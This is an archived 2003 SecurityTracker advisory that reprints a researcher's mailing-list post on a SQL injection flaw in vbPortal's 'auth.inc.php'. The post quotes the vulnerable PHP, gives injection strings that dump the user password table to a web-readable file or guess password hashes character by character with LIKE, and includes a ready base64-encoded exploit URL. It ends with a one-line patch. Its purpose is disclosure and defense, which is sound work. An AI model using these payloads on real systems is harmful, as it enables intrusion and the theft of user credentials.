SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  vbPortal Vendors:  phpPortals
vbPortal 'auth.inc.php' Input Validation Flaw Lets Remote Users Inject
SecurityTracker Alert ID:  1007695
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 13 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.0 alpha 8.1
Description:  A vulnerability was reported in vbPortal. A remote user can inject SQL commands to be executed by the underlying database server.

Frog-m@n reported that the 'auth.inc.php' script does not properly validate user-supplied input. A remote user can submit a specially crafted value for the 'admin' variable to cause user-specified SQL commands to be executed by the database server.

For example, a remote user can craft a request to execute the following SQL:

SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt'

This demonstration exploit will reportedly cause the passwords from the 'user' table to be written into a file ('UserTable.txt') that can then be downloaded via the web server [the commands are Base64 encoded]:

http://[target]/auth.inc.php?admin=JyBPUiAxP TEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
Impact:  A remote user can cause SQL commands to be executed on the underlying database server.
Solution:  No solution was available at the time of this entry.

An unofficial patch is available at:

http://www.phpsecure.info/
Vendor URL:  www.vbportal.com/ (Links to External Site)
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Frog Man" <leseulfrog@hotmail.com>
Message History:   None.

 Source Message Contents
Date:  Sat, 13 Sep 2003 00:08:25 +0200
From:  "Frog Man" <leseulfrog@hotmail.com>
Subject:  [VulnWatch] vbPortal : SQL Injection

 

Informations :
°°°°°°°°°°°°°
Language : PHP
version : 2.0 alpha 8.1
Website : http://www.vbportal.com
Problem : SQL Injection
Description : vbPortal is a Portal made to complete vBulletin as a CMS.

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
auth.inc.php :
-----------------------------------------------------------------------------------------
[...]
if(isset($admin)) {
  $admin = base64_decode($admin);
  $admin = explode(":", $admin);
  $aid = "$admin[0]";
  $pwd = "$admin[1]";
  if ($aid=="" || $pwd=="") {
    $admintest=0;
    echo "<html>\n";
    echo "<title>INTRUDER ALERT!!!</title>\n";
    echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><
br><br>\n\n";
    echo "<center><img src=\"images/eyes.gif\" border=\"0\"><
br><br>\n";
    echo "<font face=\"Verdana\" size=\"+4\"><b>Get 
Out!</b></font></center>\n";
    echo "</body>\n";
    echo "</html>\n";
    exit;
  }
  $result=mysql_query("SELECT password as pwd FROM user WHERE username = 
'$aid'");
  // $result=mysql_query("select pwd from $prefix"._authors." where 
aid='$aid'");
  if(!$result) {
        echo "Selection from database failed!";
        exit;
  } else {
    list($pass)=mysql_fetch_row($result);
    if($pass == $pwd && $pass != "") {
        $admintest = 1;
    }
  }
 
[...]
-----------------------------------------------------------------------------------------


Exploit :
°°°°°°°
The injection is made by $aid. If the value of $aid is ' OR 1=1 INTO OUTFILE 
'/complete/path/UserTable.txt, the SQL request became :

SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE 
'/complete/path/UserTable.txt'

and the passwords of the table user can be writted into UserTable.txt, and 
is readable on http://[target]/UserTable.txt if the path '/complete/path/' 
is the right way to the website directory.

Passwords can also be cracked using LIKE. For example, to know if the 
crypted password begon by 'a', you can give to $aid the value ' OR pwd LIKE 
'a%.

To inject the first and the second possiblities, we have to use $admin like 
this :
base64([VALUETOGIVETO$AID]:1);
E.g. : to use the first example, we have to crypt :
' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1
in base64, like this :
JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
and to inject this via $admin like this :
http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudH
h0OjE=

This will of course work both if magic_quotes_gpc is ON or OFF.


Solution :
°°°°°°°°°
A patch can be found on http://www.phpsecure.info.
You just have to replace the line :

---------------------
  $aid = "$admin[0]";
---------------------
in auth.inc.php by :
-------------------------------
  $aid = addslashes($admin[0]);
-------------------------------


More Details in French :
°°°°°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info/v2/tutos/vbPortal.txt



frog-m@n (http://www.phpsecure.info)

_________________________________________________________________


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC